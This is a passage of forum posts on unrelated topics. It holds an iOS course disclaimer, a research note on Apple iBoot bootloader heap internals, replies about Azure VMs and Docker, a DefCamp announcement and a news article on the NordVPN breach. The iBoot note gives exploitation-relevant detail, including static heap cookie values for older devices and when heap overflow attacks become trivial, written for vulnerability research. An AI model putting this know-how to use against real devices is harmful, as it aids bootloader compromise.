THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Donations

I don't really accept donations because I do this to share what I learn with the community. If you want to support me, just re-share this content and help it reach more people. I also have an online store (nullswag.com) with cool clothing thingies if you want to get something there.

Disclaimer

I created this course on my own and it doesn't reflect the views of my employer; all the comments and opinions are my own.

Disclaimer of Damages

Use of this course or material is, at all times, "at your own risk." If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party, for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk"; I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. This limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages.

Privacy

I'm not personally collecting any information. Since this entire course is hosted on Github, that's the privacy policy you want to read.

[^1]: I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser: you get to understand the static code (HTML/Javascript) of the website, but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company that created the application or its end users.

Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps
12. iBoot heap internals

This research note provides a basic technical outline of the Apple bootchain's heap internals, key algorithms, and security mitigations. This heap implementation is at work at all stages of the boot procedure of iPhones and other Apple devices, and in particular in SecureROM and iBoot. SecureROM (Apple's 1st stage bootloader) and iBoot (the 2nd stage bootloader) are the two most important targets of jailbreaking efforts, as they form the basic tier of the cryptographic verification foundation on which Apple's entire Secure Boot procedure stands. In general, understanding the bootchain's heap internals is essential to exploitation of heap-based memory corruption vulnerabilities in any of the boot loaders.

Aside from jailbreaking, Apple's bootchain heap makes a perfect specimen for a generalized study of heap implementations, because it is classical, simple and compact, while still maintaining all the commonly recommended security mitigation techniques. General tendencies of heap placement within the device's address space were discussed in my previous research note: iBoot address space.

Overview

Apple's bootchain uses a classical heap implementation based on free lists, enhanced with immediate coalescing and security mitigations. It is very simple compared to various well-researched kernel and userland heap implementations, such as the Low Fragmentation Heap in Microsoft Windows, or Linux's glibc. Each stage of the bootchain receives its own heap. In practice there may be 1-2 heaps backing the runtime memory requirements of the booting code, depending on the platform and the boot stage. The bootchain's heap implementation exposes a standard set of memory management APIs: malloc, calloc, realloc, memalign, free, and memcpy / memset.

Initialization

The heap is initialized in each stage's system initialization routine, immediately after various bootstrapping tasks are completed, such as code and data relocation. Heap size, number of heaps and their placement are device-specific, submodel-specific and stage-specific, although some general tendencies may be observed. [1] The initialization routine receives a contiguous piece of physical memory which is designated for the heap, and adds it to the largest bin's free-list. Heap roots - initial heap handles and bin pointers from which free lists are walked - are maintained in the data section.

Allocations and frees

The bootchain's heap allocator is based on the classical first-fit free-list algorithm with 30 bins and immediate coalescing. New heap chunks requested by malloc() are either allocated contiguously from the slab (represented by some free chunk larger than requested), or re-used from the free-list. Only the free-list based allocator is used; there are no dedicated fast-bins or a large-chunk allocator of the kind commonly found in more advanced heap implementations. On allocation, the free list of the appropriate (by size) bin is iterated, and the first free chunk that accommodates the requested size is assigned to the allocation. Unneeded free space in that chunk is chopped off and returned to the appropriate bin. A freed heap chunk is added at the top of the respective bin. If the adjacent chunk is free, the two chunks are immediately coalesced and moved to the respective bin's free-list.

Free-lists and bins

Free heap chunks are sorted by size and stored into 30 bins, numbered 2 through 31. Each bin is represented by a global variable in the data section that holds the topmost item of the free-list for that bin. A free-list is a simple doubly-linked list. The free-list's previous and next pointers are appended to each heap chunk's metadata header upon a free() operation. Free-lists are walked on each allocation request, starting from the top of the bin appropriate to the requested size of the allocation.

Heap chunk sizes are measured in and rounded to 64-byte units (2^6), including a 64-byte metadata header and reserved space for free-list pointers. For example, a minimum requested allocation size of 1 byte will in practice result in 128 bytes being allocated from the heap. Bins sort the chunks by powers of 2:

    bin  0 => 0-63 byte chunks (2^6-1) - never happens
    bin  1 => 64-127 byte chunks (2^7-1) - never happens
    bin  2 => 128-255 byte chunks
    bin  3 => 256-511 byte chunks
    bin  4 => 512-1023 byte chunks
    ... and so on, up to bin 31.

Note: Bins 0 and 1 exist, but they are never used in practice due to allocation size constraints.
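Expressed as code, the size-class math described above works out to something like this sketch (my reconstruction from the prose, not Apple's code):

    #include <stddef.h>

    /* Chunks are sized in 64-byte units with a 64-byte header; bin N holds
     * free chunks of 2^(N+6) .. 2^(N+7)-1 bytes. */
    #define HEAP_UNIT 64u

    static size_t chunk_size(size_t user_request)
    {
        /* 64-byte header, rounded up to a 64-byte boundary:
           a 1-byte request becomes a 128-byte chunk */
        return (user_request + HEAP_UNIT + HEAP_UNIT - 1) & ~(size_t)(HEAP_UNIT - 1);
    }

    static unsigned bin_index(size_t chunk_bytes)
    {
        unsigned bin = 1;                  /* 64..127 -> bin 1 (unused) */
        for (size_t s = chunk_bytes >> 7; s != 0; s >>= 1)
            bin++;                         /* 128..255 -> 2, 256..511 -> 3, ... */
        return bin;
    }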
Metadata

Each heap chunk has a metadata header prepended, which has a size of 64 bytes on both 32-bit and 64-bit systems. The header contains a 64-bit checksum, followed by a standard set of information fields: the size and busy/free status of the current and the previous chunk. Free chunks have an additional 2*size_t metadata block appended to the header, holding the pointers to the previous and the next free chunk in the bin, used while walking the free-lists.

Security mitigations

The bootchain's heap implementation employs several well-known security mitigations in order to detect random heap corruptions and harden exploit development for heap-based vulnerabilities.

1. The heap uses a 128-bit random cookie which is stored in the data section. The cookie is used for initial randomization of the heap placement and verification of heap metadata checksums. On older devices (A7 and earlier) SecureROM and LLB use a statically initialized heap cookie: [ 0x64636b783132322f, 0xa7fa3a2e367917fc ]. Note: the cookie is placed at the top of the data section, as the heap is initialized early. It will not be corrupted by a data-to-heap overflow.

2. Initial heap placement may be randomized with 24 bits of entropy, resulting in a random shift of the heap arena by at most 0x3ffc0 bytes relative to the data section or wherever else it is placed. In LLB and SecureROM the shift is not randomized on older devices (up to and inclusive of A7).

3. There is no runtime randomization in the allocation algorithm. All heap chunk addresses returned by malloc() are deterministic with respect to the heap base, as they are popped from the appropriate free-list in FIFO manner.

4. Metadata checksum verification. To prevent heap chunk metadata corruption due to a heap overflow, a chunk's checksum is verified on each heap operation, and a corrupted checksum causes an immediate panic. In addition, an extended heap verification occurs prior to executing the next stage bootloader. The checksum is calculated from the chunk's metadata based on the SipHash algorithm, using the heap cookie as a pseudo-random secret key. Due to the heap cookie being deterministic in LLB and SecureROM on A7 and earlier SoCs, the checksum is deterministic there and heap overflow attacks are trivial in that particular case. On more recent devices, cross-chunk overflow attacks may still be possible, provided that the vulnerability is pivoted to the shellcode before any heap APIs are called. Since heap usage is not very high in the bootchain, this is realistic.

5. Padding verification.
Extra bytes of the chunk beyond the user's requested size are padded with a simple rotating pattern, generated by a function of the user's requested size. This mitigation helps to detect casual heap corruptions, but has near-zero impact on exploit development complexity, since the attacker commonly controls the user size of the overflowing chunk.

6. Safe unlinking is in place. Free-list pointers are cross-checked against the previous and the next chunk on each free-list operation. A chunk's size is checked against the previous chunk's next_chunk size.

7. Double-frees are detected by verifying the current chunk's free bit in the metadata header.

8. Freed chunks are zeroed. Thus a typical use-after-free vulnerability will manifest itself as a null-pointer dereference crash. This has no impact on exploit development.

9. All new allocations are zero-initialized. This closes much of the opportunity for memory disclosure attacks via an uninitialized heap variable vulnerability.

10. Zero-sized allocations are not permitted, and will result in a panic.

11. Negatively sized allocations due to an integer underflow/overflow are possible. They are less likely on 64-bit devices, since malloc's size argument would be 64-bit in that case.

In summary, these mitigations ensure a basic level of heap protection on recent devices. Exploitation of typical heap corruption vulnerabilities such as data-to-heap and cross-chunk overflows is still possible and realistic in many cases. The strongest mitigations in place are checksum verification and safe unlinking, which make exploitation of cross-chunk overflows on recent devices non-trivial. This is especially relevant to iBoot, which uses the heap more actively than SecureROM, making it more likely that corrupted heap metadata will be detected before the shellcode has had a chance to execute.

References

1. "iBoot address space", Alisa Esage - http://re.alisa.sh/notes/iBoot-address-space.html
2. iOS Security Guide - https://www.apple.com/business/docs/site/iOS_Security_Guide.pdf
3. Memory Management Reference - https://www.memorymanagement.org/index.html

Annex A

This research note is a teaser into advanced stages of iBootcamp, an online training course on iOS internals and vulnerability research for beginners that I am creating. The only live session of Stage 0 will take place on 12-21 December 2019. You are welcome. ⭐️

Created and published by Alisa Esage Шевченко on 23 November 2019. Last edited: 23 November 2019. Original URL: http://re.alisa.sh/notes/iBoot-heap-internals.html. Author's contacts: e-mail, twitter, github.

Sursa: https://re.alisa.sh/notes/iBoot-heap-internals.html
  13. Hi, even if it fetches them from a host, someone can see where it fetches them from and fetch them themselves. There is no way for an application to connect directly to a database such that a malicious person cannot do the same thing. For this kind of use case you can build a web application, an API, which the C# application contacts and which performs the database operations. Preferably with authentication (e.g. a user logs in and then does various things there). A sketch follows below.
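As a rough sketch of the setup suggested above, in Python with Flask standing in for the web API (the endpoint, token check and query are all invented for the example; a real deployment needs proper login and token management, and HTTPS):

from flask import Flask, abort, jsonify, request
import sqlite3

app = Flask(__name__)
VALID_TOKENS = {"token-issued-after-login"}  # placeholder token store

@app.route("/api/items")
def list_items():
    # The client application talks only to this API; the database
    # credentials never leave the server.
    auth = request.headers.get("Authorization", "")
    if auth.removeprefix("Bearer ") not in VALID_TOKENS:  # Python 3.9+
        abort(401)
    rows = sqlite3.connect("app.db").execute(
        "SELECT id, name FROM items").fetchall()
    return jsonify([{"id": r[0], "name": r[1]} for r in rows])

if __name__ == "__main__":
    app.run()

The C# application would then call /api/items with its token instead of embedding database credentials.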
  14. Anyone who strays from the subject again, throws insults or goes offtopic gets an instant ban.
  15. Look for a book, either buy one or download it as a PDF (you can find pretty much anything you want), and read it. Practice while you read. I think that's the simplest and most effective way. As for other documentation, there's php.net, where you'll find pretty much everything you need, plus a ton of tutorials on any topic. Including the security side, where you have to be careful.
  16. If you don't have a ticket yet, get one today; apparently prices go up starting tomorrow.
  17. Just forge some badges yourselves, how hard can it be?
  18. As a hint, there is a "://" in that message, so it's probably a URL. Then there are those numbers, which things can be done with.
  19. Using the Azure API you create a Windows 10 virtual machine. You can build one image containing whatever you want pre-installed and clone it whenever you create a new VM. You generate a random password and allow the RDP port in the Network Security Group on the created resource (the VM). Then users connect over RDP and do whatever they want in there. There are plenty of discussions about creating VMs on Stack Overflow. See the sketch below for the password step.
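For the random-password step, a minimal sketch using Python's standard secrets module (the length and alphabet are arbitrary choices here; check Azure's complexity requirements for VM admin passwords):

import secrets
import string

def random_password(length=24):
    # Cryptographically secure choice from letters, digits and punctuation.
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(random_password())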
  20. It depends on what you mean by that remote control. First of all, what operating system will the virtual machines run, Linux? Then, what do you want to allow users to do through that remote control?
  21. If you use virtual machines in Azure, you can use the Azure API to create them, and it's not difficult. I don't know how it works out cost-wise, though. https://docs.microsoft.com/en-us/azure/virtual-machines/linux/create-vm-rest-api
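Per the linked documentation, creating the VM boils down to one authenticated REST call. A trimmed sketch in Python (subscription ID, resource group, access token and most of the request body are placeholders; take the api-version and the full schema, including storageProfile and networkProfile, from the docs):

import requests

SUB, RG, VM = "<subscription-id>", "<resource-group>", "<vm-name>"
url = (f"https://management.azure.com/subscriptions/{SUB}"
       f"/resourceGroups/{RG}/providers/Microsoft.Compute"
       f"/virtualMachines/{VM}?api-version=2019-07-01")
body = {
    "location": "westeurope",
    "properties": {
        "hardwareProfile": {"vmSize": "Standard_B2s"},
        "osProfile": {
            "computerName": VM,
            "adminUsername": "azureuser",
            "adminPassword": "<generated-password>",
        },
        # storageProfile and networkProfile omitted; see the linked docs
    },
}
resp = requests.put(url, json=body,
                    headers={"Authorization": "Bearer <access-token>"})
resp.raise_for_status()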
  22. International Hacking & Information Security Conference, 7-8 November 2019, Bucharest, Romania.

About DefCamp: DefCamp is the most important annual conference on Hacking & Information Security in Central and Eastern Europe. Every year it brings together the world's leading cyber security practitioners to share their latest research and knowledge. Over 2,000 decision makers, security specialists, entrepreneurs, developers, and people from academia and the private and public sectors meet under the same roof in Bucharest, Romania every fall, in November. Internationally recognized speakers showcase the naked truth about sensitive topics like infrastructure (in)security, GDPR, cyber warfare, ransomware, malware, social engineering, and offensive & defensive security measures. Yet the most active part of the conference is the Hacking Village, the specially designed playground for all the hacking activities happening at DefCamp.

Site: https://def.camp/
  23. Hi, if you only want it for testing and not something professional (e.g. something you'd charge money for), the SIMPLEST solution might be to create a Docker container. It's just not quite a virtual machine. If you want to hand out VPSes, it gets more complicated.
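A minimal sketch with the Docker SDK for Python (the image and command are placeholders; this assumes "pip install docker" and a running Docker daemon):

import docker

client = docker.from_env()
container = client.containers.run(
    "ubuntu:18.04",            # placeholder image
    command="sleep infinity",  # keep the container running
    detach=True,
)
print(container.short_id)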
  24. NordVPN, a virtual private network provider that promises to “protect your privacy online,” has confirmed it was hacked. The admission comes following rumors that the company had been breached. It first emerged that NordVPN had an expired internal private key exposed, potentially allowing anyone to spin up their own servers imitating NordVPN.

VPN providers are increasingly popular as they ostensibly hide your internet browsing traffic from your internet provider and from the sites you visit. That's why journalists and activists often use these services, particularly when they're working in hostile states. These providers channel all of your internet traffic through one encrypted pipe, making it more difficult for anyone on the internet to see which sites you are visiting or which apps you are using. But often that means displacing your browsing history from your internet provider to your VPN provider. That's left many providers open to scrutiny, as it's often not clear whether each provider is logging every site a user visits.

For its part, NordVPN has claimed a “zero logs” policy. “We don't track, collect, or share your private data,” the company says. But the breach is likely to cause alarm that hackers may have been in a position to access some user data.

NordVPN told TechCrunch that one of its data centers was accessed in March 2018. “One of the data centers in Finland we are renting our servers from was accessed with no authorization,” said NordVPN spokesperson Laura Tyrell. The attacker gained access to the server, which had been active for about a month, by exploiting an insecure remote management system left by the data center provider; NordVPN said it was unaware that such a system existed. NordVPN did not name the data center provider.

“The server itself did not contain any user activity logs; none of our applications send user-created credentials for authentication, so usernames and passwords couldn't have been intercepted either,” said the spokesperson. “On the same note, the only possible way to abuse the website traffic was by performing a personalized and complicated man-in-the-middle attack to intercept a single connection that tried to access NordVPN.”

According to the spokesperson, the expired private key could not have been used to decrypt the VPN traffic on any other server. NordVPN said it found out about the breach a “few months ago,” but the spokesperson said the breach was not disclosed until today because the company wanted to be “100% sure that each component within our infrastructure is secure.”

A senior security researcher we spoke to, who reviewed the statement and other evidence of the breach but asked not to be named as they work for a company that requires authorization to speak to the press, called these findings “troubling.” “While this is unconfirmed and we await further forensic evidence, this is an indication of a full remote compromise of this provider's systems,” the security researcher said. “That should be deeply concerning to anyone who uses or promotes these particular services.”

NordVPN said “no other server on our network has been affected.” But the security researcher warned that NordVPN was ignoring the larger issue of the attacker's possible access across the network. “Your car was just stolen and taken on a joy ride and you're quibbling about which buttons were pushed on the radio?” the researcher said.
The company confirmed it had installed intrusion detection systems, a popular technology that companies use to detect breaches early, but “no-one could know about an undisclosed remote management system left by the [data center] provider,” said the spokesperson. “They spent millions on ads, but apparently nothing on effective defensive security,” the researcher said.

NordVPN was recently recommended by TechRadar and PCMag. CNET described it as its “favorite” VPN provider.

It's also believed several other VPN providers may have been breached around the same time. Similar records posted online, and seen by TechCrunch, suggest that TorGuard and VikingVPN may have also been compromised. A spokesperson for TorGuard told TechCrunch that a “single server” was compromised in 2017 but denied that any VPN traffic was accessed. TorGuard also put out an extensive statement following a May blog post, which first revealed the breach.

Updated with comment from TorGuard.

Source: https://techcrunch.com/2019/10/21/nordvpn-confirms-it-was-hacked/